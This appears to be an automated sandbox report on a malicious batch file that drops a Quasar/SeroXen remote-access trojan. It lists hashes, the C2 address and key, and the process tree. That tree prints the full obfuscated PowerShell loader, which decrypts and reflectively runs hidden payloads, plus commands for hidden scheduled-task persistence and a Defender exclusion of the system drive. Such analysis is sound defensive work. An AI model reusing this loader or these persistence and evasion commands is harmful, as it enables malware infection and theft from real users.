Analysis
-
max time kernel
134s
-
max time network
135s
-
platform
windows10-1703_x64
-
resource
win10-20240404-en
-
resource tags
arch:x64, arch:x86, image:win10-20240404-en, locale:en-us, os:windows10-1703-x64, system
-
submitted
28-04-2024 16:14
Static task
static1
Behavioral task
behavioral1
Sample
rename me.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
rename me.bat
Resource
win10v2004-20240426-en
General
-
Target
rename me.bat
-
Size
514KB
-
MD5
414264bb47935bed191128cf44f3a2cd
-
SHA1
df49e4f8bc8d388c9b9398f29b0de0e72e79b130
-
SHA256
a59ef50cd65d900c84024d9da88c4c93c9ae7fba7e2429c41d45081d381ad8ef
-
SHA512
c15ca12cd576157369574c3a51ece0879ccee3b57614af91d6e99af21e8fdeb46d1680e2692a38d4da6b4ebb63f9e17341d0cc6ac616e6c2ebd36e698e588e66
-
SSDEEP
12288:40xb2yL+sSyycyuVWTuM+EiWCCPt2EIKgEtoOT9ah:46bTLrSyycy9uM+EipCfhgTOTAh
Malware Config
Extracted
quasar
3.1.5
SeroXen
147.185.221.19:33587
$Sxr-2rfrZTKITtK0P0zGYG
-
encryption_key
Yr0YpBPNd3kXsl43jZMx
-
install_name
$sxr-sdinwn.exe
-
log_directory
$sxr
-
reconnect_delay
3000
-
startup_key
$sxr-metsha
-
subdirectory
sxr
Signatures
-
Quasar payload 1 IoCs
Processes:
resource | yara_rule
behavioral1/memory/2144-195-0x0000000008F10000-0x0000000008F7E000-memory.dmp | family_quasar
-
Blocklisted process makes network request 1 IoCs
Processes:
flow | pid | process
2 | 2144 | powershell.exe
-
Drops file in Drivers directory 1 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | powershell.exe
-
Executes dropped EXE 1 IoCs
Processes:
pid | process
2616 | $sxr-sdinwn.exe
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
1 | ip-api.com
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
pid | process
4248 | ipconfig.exe
-
Modifies registry class 1 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings | powershell.exe
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
pid | process
4936 | powershell.exe
32 | powershell.exe
2144 | powershell.exe
2616 | $sxr-sdinwn.exe
5004 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 4936 | powershell.exe
Token: SeDebugPrivilege | 32 | powershell.exe
Token: SeIncreaseQuotaPrivilege | 32 | powershell.exe
Token: SeSecurityPrivilege | 32 | powershell.exe
Token: SeTakeOwnershipPrivilege | 32 | powershell.exe
Token: SeLoadDriverPrivilege | 32 | powershell.exe
Token: SeSystemProfilePrivilege | 32 | powershell.exe
Token: SeSystemtimePrivilege | 32 | powershell.exe
Token: SeProfSingleProcessPrivilege | 32 | powershell.exe
Token: SeIncBasePriorityPrivilege | 32 | powershell.exe
Token: SeCreatePagefilePrivilege | 32 | powershell.exe
Token: SeBackupPrivilege | 32 | powershell.exe
Token: SeRestorePrivilege | 32 | powershell.exe
Token: SeShutdownPrivilege | 32 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 32 | powershell.exe
Token: SeRemoteShutdownPrivilege | 32 | powershell.exe
Token: SeUndockPrivilege | 32 | powershell.exe
Token: SeManageVolumePrivilege | 32 | powershell.exe
Token: 33 | 32 | powershell.exe
Token: 34 | 32 | powershell.exe
Token: 35 | 32 | powershell.exe
Token: 36 | 32 | powershell.exe
-
Suspicious use of WriteProcessMemory 27 IoCs
Processes:
description | pid | process | target process
PID 4240 wrote to memory of 4936 | 4240 | cmd.exe | powershell.exe
PID 4936 wrote to memory of 32 | 4936 | powershell.exe | powershell.exe
PID 4936 wrote to memory of 2968 | 4936 | powershell.exe | WScript.exe
PID 2968 wrote to memory of 3156 | 2968 | WScript.exe | cmd.exe
PID 3156 wrote to memory of 2144 | 3156 | cmd.exe | powershell.exe
PID 2144 wrote to memory of 4928 | 2144 | powershell.exe | schtasks.exe
PID 2144 wrote to memory of 2616 | 2144 | powershell.exe | $sxr-sdinwn.exe
PID 2144 wrote to memory of 5004 | 2144 | powershell.exe | powershell.exe
PID 2144 wrote to memory of 4248 | 2144 | powershell.exe | ipconfig.exe
Processes
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rename me.bat"
1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u1oRCj2FshaYqShJzWoB9MDj3heRxmVxxmXikszKBtg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uZjnBsjcIwRFHmtV5yG+9A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BrvxA=New-Object System.IO.MemoryStream(,$param_var); $VtfzT=New-Object System.IO.MemoryStream; $asXGT=New-Object System.IO.Compression.GZipStream($BrvxA, [IO.Compression.CompressionMode]::Decompress); $asXGT.CopyTo($VtfzT); $asXGT.Dispose(); $BrvxA.Dispose(); $VtfzT.Dispose(); $VtfzT.ToArray();}function execute_function($param_var,$param2_var){ $ulMDb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TvXyl=$ulMDb.EntryPoint; $TvXyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\rename me.bat';$lVIfc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\rename me.bat').Split([Environment]::NewLine);foreach ($ZSRPZ in $lVIfc) { if ($ZSRPZ.StartsWith(':: ')) { $Lwvfw=$ZSRPZ.Substring(3); break; }}$payloads_var=[string[]]$Lwvfw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_806_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_806.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_806.vbs"
3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_806.bat" "
4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u1oRCj2FshaYqShJzWoB9MDj3heRxmVxxmXikszKBtg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uZjnBsjcIwRFHmtV5yG+9A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BrvxA=New-Object System.IO.MemoryStream(,$param_var); $VtfzT=New-Object System.IO.MemoryStream; $asXGT=New-Object System.IO.Compression.GZipStream($BrvxA, [IO.Compression.CompressionMode]::Decompress); $asXGT.CopyTo($VtfzT); $asXGT.Dispose(); $BrvxA.Dispose(); $VtfzT.Dispose(); $VtfzT.ToArray();}function execute_function($param_var,$param2_var){ $ulMDb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TvXyl=$ulMDb.EntryPoint; $TvXyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_806.bat';$lVIfc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_806.bat').Split([Environment]::NewLine);foreach ($ZSRPZ in $lVIfc) { if ($ZSRPZ.StartsWith(':: ')) { $Lwvfw=$ZSRPZ.Substring(3); break; }}$payloads_var=[string[]]$Lwvfw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
5⤵
- Blocklisted process makes network request
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$sxr-metsha" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exe
"C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exe"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath (Get-Item -LiteralPath $env:SystemRoot).Root"
6⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\ipconfig.exe
"C:\Windows\System32\ipconfig.exe" /flushdns
6⤵
- Gathers network information
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
17KB
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
18KB
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_43kzohf1.fn5.ps1
Filesize
1B
-
C:\Users\Admin\AppData\Roaming\startup_str_806.bat
Filesize
514KB
-
C:\Users\Admin\AppData\Roaming\startup_str_806.vbs
Filesize
115B
-
C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exe
Filesize
420KB